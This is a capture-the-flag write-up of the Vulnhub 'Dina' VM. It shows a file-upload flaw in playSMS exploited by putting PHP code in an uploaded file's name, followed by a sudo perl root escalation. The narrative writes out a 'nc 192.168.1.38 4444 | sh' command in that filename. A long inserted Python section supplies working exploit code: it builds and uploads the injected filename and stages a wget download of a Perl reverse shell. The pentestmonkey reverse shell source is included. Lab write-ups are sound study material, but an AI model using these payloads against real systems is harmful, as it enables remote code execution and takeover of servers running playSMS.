Write-up by Anders Kusk.

Vulnhub.com – Dina

> 21/11/17

VM created by Touhid Shaikh

Software used: nmap, dirbuster, netcat, Python's built-in HTTP server, perl

A beginner CTF VM from vulnhub. Easy and quick to do.

First a look at the box with nmap. Only an HTTP server was open.

Visiting the website didn’t give anything useful. Running dirbuster against the server turned up a few interesting files and directories.

/nothing/pass was a text file with what looked like passwords.

After downloading backup.zip and opening it, I found that it was password protected. The password “freedom” from the pass file opened the zip and extracted “backup-cred.mp3”. Despite the extension this was also a text file, and it contained a username and a URL.

Visiting the URL showed that it was hosting something called playSMS. With the username “touhid” and the password “diana” from the pass file I was able to log in.

Searching exploit-db for playSMS showed that there was an exploit in the file upload function. The exploit description reads:

> Unrestricted File Upload:
>
> Any registered user can upload any file because of improper validation of the file in sendfromfile.php.
>
> Code Execution using $filename
>
> Now we know sendfromfile.php accepts any file extension and just reads the content, which is not stored on the server. But there is a bug: when a user uploads, for example, mybackdoor.php, the server accepts it happily but does not store it in any folder, so our shell is useless. But if the user changes the file name from “mybackdoor.php” to “.php”, then the server checks the file and sets a parameter $filename=”.php”; you can see the code below, and it displays $filename on the page.

When a file is uploaded, playSMS displays the name of the uploaded file on the web page, and a filename containing PHP code gets executed server-side on the way. The problem is that a filename can’t contain a lot of useful characters, e.g. a forward slash. So we will not be able to do much directory traversal other than to a parent directory. Sooo, what to do?

Well, at least I can take a look in the parent directory. I uploaded a file whose filename “a.png” carried a PHP directory listing in the name; the page then listed all files recursively from the parent directory, including their permissions. That way I could see which folders I could write to. It looked like “tmp” and “uploads” were writable by everybody.

Next, I created a small script that would download a reverse shell from my workstation and execute it. I then set up netcat to send that script to anybody who connected.

A quick Python HTTP server served the reverse shell itself.

I then created a file called “a<?php system("nc 192.168.1.38 4444 | sh"); ?>.png”. When uploaded, the command in the filename would connect to my netcat session on port 4444, receive the script and execute it with a shell.

Since that script would download and execute the Perl reverse shell, which would in turn connect back to my workstation on port 4445, I needed a netcat listener on that port as well. After uploading the file, playSMS ran netcat, which fetched my script and executed it; the script downloaded the Perl reverse shell and ran it, and that connected to my second netcat session and gave me a shell.
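The two pieces above, the PHP-in-filename upload and the nc/HTTP staging chain, as one added example. This is not the write-up author's tooling and not playSMS code. Assumed and not taken from the page: the upload form field name (FIELD), the upload URL and session cookie given to upload_payload(), and the Python HTTP server port 8000; the attacker address 192.168.1.38 and ports 4444/4445 are the ones the write-up uses. The filename constraints are what decide whether a payload can go straight into the name or has to be staged, which is why the write-up stages it.

```python
"""Helpers for the playSMS filename-injection path described in this write-up.

Added example: this is not the write-up author's tooling and not playSMS code.
Assumed and not taken from the page: the upload form field name FIELD, the
upload URL and session cookie passed to upload_payload(), and the Python HTTP
server port 8000.  The attacker address 192.168.1.38 and ports 4444/4445 are
the page's.
"""
import http.client
import secrets
from urllib.parse import urlparse

NAME_MAX = 255              # Linux: maximum bytes in a single path component
FIELD = "fnSendFromFile"    # assumed name of the file input in the upload form


def payload_filename(cmd: str, stem: str = "a", ext: str = ".png") -> str:
    """Wrap a shell command in a PHP system() call carried by the filename.

    What cannot go in the name:
      * '/' and NUL: not valid in a Linux filename, the browser sends only the
        basename, and PHP strips path components from $_FILES[..]['name'];
      * '"', CR, LF: they would break the Content-Disposition header, and
        browsers and PHP disagree on how to escape them;
      * "'" and '\\': the PHP string is single-quoted and backslash escaping
        inside a header value is unreliable, so they are rejected outright.
    Anything that needs those characters is staged through nc, as the
    write-up does, instead of being put in the name.
    """
    forbidden = set("/\0\"\r\n'\\")
    hit = forbidden & set(cmd)
    if hit:
        raise ValueError(f"command contains characters that cannot travel in a filename: {sorted(hit)}")
    name = f"{stem}<?php system('{cmd}'); ?>{ext}"
    if len(name.encode()) > NAME_MAX:
        raise ValueError(f"filename is {len(name.encode())} bytes, limit is {NAME_MAX}")
    return name


def multipart_body(filename: str, content: bytes, boundary: str) -> bytes:
    """Build a multipart/form-data body with one file part, filename verbatim.

    RFC 7578 does not require the filename to be encoded, and a browser puts it
    in the header as-is too, so the PHP in the name reaches the server intact.
    """
    if boundary.encode() in content:
        raise ValueError("boundary collides with file content")
    crlf = b"\r\n"
    return crlf.join([
        b"--" + boundary.encode(),
        f'Content-Disposition: form-data; name="{FIELD}"; filename="{filename}"'.encode(),
        b"Content-Type: image/png",
        b"",
        content,
        b"--" + boundary.encode() + b"--",
        b"",
    ])


def upload_payload(url: str, cookie: str, filename: str, content: bytes = b"\x89PNG") -> int:
    """POST the crafted upload to playSMS with a logged-in session cookie; returns the HTTP status."""
    u = urlparse(url)
    boundary = "----" + secrets.token_hex(16)
    body = multipart_body(filename, content, boundary)
    path = u.path + (f"?{u.query}" if u.query else "")
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
    conn.request("POST", path, body=body, headers={
        "Cookie": cookie,
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    })
    return conn.getresponse().status


def stager_script(attacker: str, http_port: int = 8000, name: str = "rs.pl") -> str:
    """Script the nc listener on 4444 hands to `nc attacker 4444 | sh` on the target:
    fetch the Perl reverse shell from the Python HTTP server and run it."""
    return f"cd /tmp\nwget -q http://{attacker}:{http_port}/{name}\nperl {name}\n"


def perl_reverse_shell(attacker: str, port: int) -> str:
    """Perl connect-back shell (the well-known pentestmonkey one-liner) to serve as rs.pl."""
    return (
        "use Socket;"
        f'$i="{attacker}";$p={port};'
        'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
        "if(connect(S,sockaddr_in($p,inet_aton($i)))){"
        'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
        'exec("/bin/sh -i");};\n'
    )


if __name__ == "__main__":
    attacker = "192.168.1.38"
    print("filename :", payload_filename(f"nc {attacker} 4444 | sh"))
    print("stager   :", stager_script(attacker), sep="\n")
    print("rs.pl    :", perl_reverse_shell(attacker, 4445), sep="\n")
```

The directory-listing step works the same way: payload_filename("ls -laR ..") is accepted because the command needs no slash, while anything with an absolute path is rejected and has to go through the stager. Use a single-quoted PHP string and keep double quotes out of the name when uploading by hand, since browsers escape a quote in a multipart filename differently from how PHP unescapes it.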

I was now in as the www-data user. A quick test showed that www-data was allowed to run perl with sudo. Easy stuff.

So I fetched a new reverse shell with wget, this time configured to connect to another netcat session on port 4446, ran it with sudo and got a new reverse shell, this time with root rights. I now had the root flag! Easy.